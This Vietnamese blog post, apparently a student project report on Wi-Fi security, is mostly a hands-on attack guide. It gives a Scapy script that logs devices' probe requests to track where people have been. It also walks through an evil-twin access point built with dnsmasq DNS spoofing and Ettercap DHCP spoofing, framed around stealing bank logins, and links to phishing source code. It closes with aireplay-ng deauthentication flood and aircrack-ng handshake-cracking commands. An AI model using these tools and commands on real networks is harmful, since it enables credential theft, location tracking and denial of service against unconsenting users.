Báo cáo đồ án WIFI SECURITY ( attack and “chémgió” )

Nhiều khi muốn viết xong lại nghỉ, muốn nghỉ xong lại viết rồi cuối cùng thì viết, Dù gì thì đây là một trong những Project đầu tiên cảm thấy mình thực sự hữu dụng.
Câu truyện bắt đầu từ một từ “tuyên giáo” à nhầm “Phà”, vì đây là lần đầu tiên mình đi phà :xuốngnúi:
3

Chém gió vậy thôi, đây mới là phần chính

Đã bao giờ bạn nghĩ mình đã che dấu tất cả mà sao vẫn bị phát hiện chưa, hoặc tại sao ngày đó mình toàn bị mất account trong khi mình không tiết lộ 1 bit. Mọi thứ trở nên không còn được bảo vệ khi bạn đang truy cập vào một trạm phát sóng lừa đảo hoặc cũng chẳng truy cập vào đâu cả.

* Vấn đề 1: Bạn đang thú tội với mọi người xung quanh
Nếu bạn nói dối, hãy chắc chắn là bạn đang nói dối với đúng người, mọi thứ xung quanh đã thú tội trước khi bạn nhắm mắt.
Đầu tiên nói về kết nối wireless network, ở đây có 2 trường hợp xảy khi kết nối: bị động và chủ động
Với trường hợp bị động, các thiết bị trên mode Master sẽ gửi các gói tin Beacon để quảng bá tín hiệu, sau đó các thiết bị mode Manager sẽ nhận thấy cường độ sẽ lưu lại chờ lệnh kết nối.
Với trường hợp chủ động, các thiết bị muốn được kết nối sẽ hỏi thăm những Wifi đã từng kết nối bằng các gói tin Probe Request, gói tin này vô tình tố cáo ngày hôm qua bạn đã truy cập vào wifi nào -> hôm qua bạn đã đi đâu, thật đau khổ khi những việc riêng tư như vậy được chia sẻ với tất cả mọi người
basic tool để khai thác điều này.

#!/usr/bin/python
from scapy.all import *

MAC_ADDR = []
SSID = []
i = 0
logfile = "captured.log"
def PacketHandler(pkt):
  global i
  if pkt.haslayer(Dot11):
    if pkt.type == 0 and pkt.subtype == 4:
      i+= 1
      PrintPacket(pkt, i)

def PrintPacket(pkt, i):
  global MAC_ADDR
  global SSID
  
  mac_addr = pkt.addr2
  ssid = pkt.getlayer(Dot11ProbeReq).info
  if mac_addr not in MAC_ADDR:
    MAC_ADDR.append(mac_addr)

  if ssid != "":
    print "|\t%02s\t" % i, "|\t", mac_addr, "\t|", ssid
    open(logfile, "a").write(mac_addr + " " + ssid + "\n")
  
def main():
  print "|\tNo \t|", "\tMAC Address\t\t", "| SSID\t"
  print "|---------------|-------------------------------|-------------------------------"
  sniff(iface="wlan0", prn=PacketHandler)


  for mac_addr in MAC_ADDR:
    print "This device (%s) had connected to:" % mac_addr
    tmp = []
    for line in open(logfile).readlines():
      if mac_addr in line:
        if line[18:-1] not in tmp and line[18:-1] != "":
          print " " * 50, line[18:-1]
          tmp.append(line[18:-1])
          
main()

Cảm ơn anh Quân Đoàn đã chia sẻ ❤
* Vấn đề 2: Liệu có an toàn khi bạn kết nối tới 1 Access Point lạ.
Xem Video cho rõ nào:


Tên đăng nhập và password của vietcombank dễ lấy vậy sao?
OK giờ mình sẽ chỉ cho các bạn tạo 1 "wifi lạ"
Bước 1: Triệu hồi Tool
Create_ap : https://github.com/oblique/create_ap
DHCPD : sudo apt-get install isc-dhcp-server
DNSmasq : https://github.com/guns/dnsmasq
Ettercap : https://ettercap.github.io/ettercap/ Nếu không thể cái DHCP hoặc DHCP không ổn định
và quan trọng nhất apache để làm bất cứ thứ gì mình thích
Mình để sourcecode ở đây và không nói gì thêm
https://drive.google.com/open?id=0B82ak4muq6oIY1hSbURTNnd3YXc
https://drive.google.com/open?id=0B31L-TTjA07TUVE1UzRmbFdLT2M
Bước 2: Cài đặt và config
Các tool kia mình không nói thêm vì cài đặt rất đơn giản, mình chỉ nói tới DNSmasq vì cái này cần config nhất.
Trong file /etc/dnsmasq.conf

no-dhcp-interface=
server=8.8.8.8

no-hosts
addn-hosts=/etc/dnsmasq.hosts

với server=8.8.8.8 là server mà bạn muốn forward tới
còn file /etc/dnsmasq.hosts là DNS cache
sau đó vào file dnsmasq.hosts để config những tên miền mà bạn muốn fake qua địa chỉ nào.

Bước 3: Chạy, ở đây mình không có đủ card nên chạy 2 card wlan0 và eth0
#create_ap -m bridge wlan0 eth0 tenwifi passwordwifi
Mở tab khác bật dnsmasq
#killall -9 dnsmasq
#dnsmasq -q -d
Bật ettercap và config DHCP spoofing qua DNS của mình
Bước 4: Chờ đợi là hạnh phúc
1
* Vấn đề 3: Tấn công DOS
Câu thần chú có thể tàn phá hầu hết các con router cùi:
# aireplay-ng –ignore-negative-one –deauth 1000 -a D1:11:11:11:11:11 wlan0
với D1:11:11:11:11:11 là SSID của con router: tìm không khó, nhiều tool, bật wireshark cũng thấy được
wlan0 là card mạng ở mode monitor
* Vấn đề 4: Crack Wifi
Mình chỉ nói tới từ điển vì các loại khác khá lâu, nếu từ điển mạnh thì khả năng lấy được pass là khá chắc
Bộ công cụ aircrack quá nổi tiếng rồi
#airmon-ng start wlan0 // bật mode monitor ở card ảo wlan0mon
#airmon-ng start kill / airmon-ng check kill // bỏ đi những thứ không cần
#airodump-ng wlan0mon // Sniff trên mode Monitor tìm vài thứ
#airodump-ng -c [kênh] –bssid [BSSID] -w [đường dẫn sẽ lưu file bắt tay]
#aireplay-ng –ignore-negative-one –deauth 1000 -a D1:11:11:11:11:11 wlan0mon // kick nó ra cho nó vào lại mới lấy được file bắt tay chứ 🙂
# aircrack-ng -w [Từ điển] [File bắt tay]

Advertisements

Trả lời

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Log Out / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Log Out / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Log Out / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Log Out / Thay đổi )

Connecting to %s